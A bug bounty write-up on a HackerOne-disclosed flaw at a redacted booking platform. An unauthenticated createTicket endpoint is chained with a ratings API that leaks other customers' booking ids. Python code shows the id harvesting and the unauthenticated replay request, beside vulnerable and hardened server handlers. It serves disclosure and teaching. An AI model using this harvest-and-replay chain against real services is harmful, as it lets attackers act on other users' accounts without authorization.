Unauthenticated API Endpoint to Create Support Ticket Worth $500
Hello hackers, I am back with a new bug bounty write-up. In this blog, I am going to show how I was able to create a support ticket on behalf of other users without any authentication at one of India's unicorn startups. The company runs a public bug bounty program on HackerOne. I will be using redacted.com as the main domain.
The company is a technology platform through which customers book different types of services.
www.redacted.com and api.redacted.com are in scope. As usual, I started exploring the application and capturing every request in Burp Suite. redacted.com is the main domain, but all the traffic routes through api.redacted.com. I had used the platform in the past to book some services, so I have some bookings in my account.
There is an option to raise a support ticket for your bookings. When you raise a ticket, a POST request is sent to the endpoint https://api.redacted.com/api/v2/marketplace/ticketV2/createTicket with the body:
{"city_key":null,"userId":"hashed_user_id","referenceId":"booking_id","issueType":"send_email_invoice","sourceKey":"help_center"}
In the request, referenceId is the booking_id. From Burp Suite, I replayed the same request without the authentication token, and when I checked the ticket tab in my profile, I saw that a support ticket had been raised without authentication. In other words, the endpoint accepts the userId and referenceId from the request body without verifying who is calling it.
The main problem is the impact: the booking_id is a randomly and uniquely generated hashed string, so brute-forcing the booking_id is not possible here.
To increase the impact, I explored the platform again and found an API endpoint that displays the ratings and comments users have left for the services they used. In the API response, each rating/comment contains the booking_id in the key customer_request_id, so other users' booking ids are exposed.
Now I had a list of booking_ids that could be used to create support tickets on behalf of any of those users via the vulnerable endpoint https://api.redacted.com/api/v2/marketplace/ticketV2/createTicket. Chained together, the information leak and the missing authentication check let an unauthenticated attacker open tickets against other customers' bookings.
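To make the chain concrete, here is an added example (my own code, not the author's or the company's) that reproduces both halves of the bug offline: harvesting booking ids from a ratings response and building the unauthenticated createTicket replay, followed by a hypothetical server-side handler in its vulnerable and hardened forms. The ratings response, the booking ids, the user ids and the handler internals are all constructed for this example; only the endpoint URL, the request body shape and the customer_request_id key come from the write-up.

```python
import json
import urllib.request
from dataclasses import dataclass, field
from typing import Optional

ENDPOINT = "https://api.redacted.com/api/v2/marketplace/ticketV2/createTicket"

# Constructed sample of what the ratings/comments endpoint might return.
# Only the key name customer_request_id is from the write-up; values are made up.
RATINGS_RESPONSE = json.dumps({
    "ratings": [
        {"customer_request_id": "bk_9f2a7c", "rating": 5, "comment": "Great service"},
        {"customer_request_id": "bk_c41e0d", "rating": 2, "comment": "Late arrival"},
        {"customer_request_id": "bk_9f2a7c", "rating": 4, "comment": "Second visit"},
        {"rating": 3, "comment": "entry without a booking id"},
    ]
})


def harvest_booking_ids(raw: str) -> list:
    """Collect unique booking ids (customer_request_id) from a ratings response, in order."""
    found = []
    for entry in json.loads(raw).get("ratings", []):
        bid = entry.get("customer_request_id")
        if bid and bid not in found:
            found.append(bid)
    return found


def build_ticket_body(user_id: str, booking_id: str) -> dict:
    """Same body shape as the captured request; referenceId carries the booking id."""
    return {
        "city_key": None,
        "userId": user_id,
        "referenceId": booking_id,
        "issueType": "send_email_invoice",
        "sourceKey": "help_center",
    }


def build_unauthenticated_request(body: dict) -> urllib.request.Request:
    """The replay: a POST with no Authorization or Cookie header (built, not sent)."""
    return urllib.request.Request(
        ENDPOINT,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


# --- Hypothetical server side: vulnerable handler beside the hardened one ---

# Constructed ownership table: booking id -> owning user id.
BOOKINGS = {"bk_9f2a7c": "user_alice", "bk_c41e0d": "user_bob"}


@dataclass
class TicketStore:
    tickets: list = field(default_factory=list)


def create_ticket_vulnerable(store: TicketStore, body: dict,
                             auth_user: Optional[str] = None) -> int:
    """Trusts userId/referenceId from the body and never looks at the session,
    which is the behaviour the write-up observed. Returns an HTTP-style status."""
    store.tickets.append({"user": body["userId"], "booking": body["referenceId"]})
    return 201


def create_ticket_hardened(store: TicketStore, body: dict,
                           auth_user: Optional[str] = None) -> int:
    """Requires a session, takes identity from it (not the body), and checks
    that the referenced booking belongs to the caller."""
    if auth_user is None:
        return 401  # unauthenticated replay is rejected
    owner = BOOKINGS.get(body.get("referenceId"))
    if owner is None or owner != auth_user:
        return 403  # booking exists but is not yours (or does not exist)
    store.tickets.append({"user": auth_user, "booking": body["referenceId"]})
    return 201
```

The hardened handler fixes both defects at once: the missing authentication check (401) and the missing object-level authorization on referenceId (403). Note that it also discards the client-supplied userId, since an identity field in the body is never something the server should trust.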
I quickly wrote a report to the security team through HackerOne. The company fixed the issue and rewarded a bounty of $500.
Timeline:
March 06, 2024 — Reported
March 07, 2024 — Triaged and $500 bounty awarded.
March 12, 2024 — Fixed.
Thanks for reading, hope you learned something new. Do clap and share if you like. Sayonara and Happy Hacking!
Twitter: 7he_unlucky_guy
Linkedin: Vijeta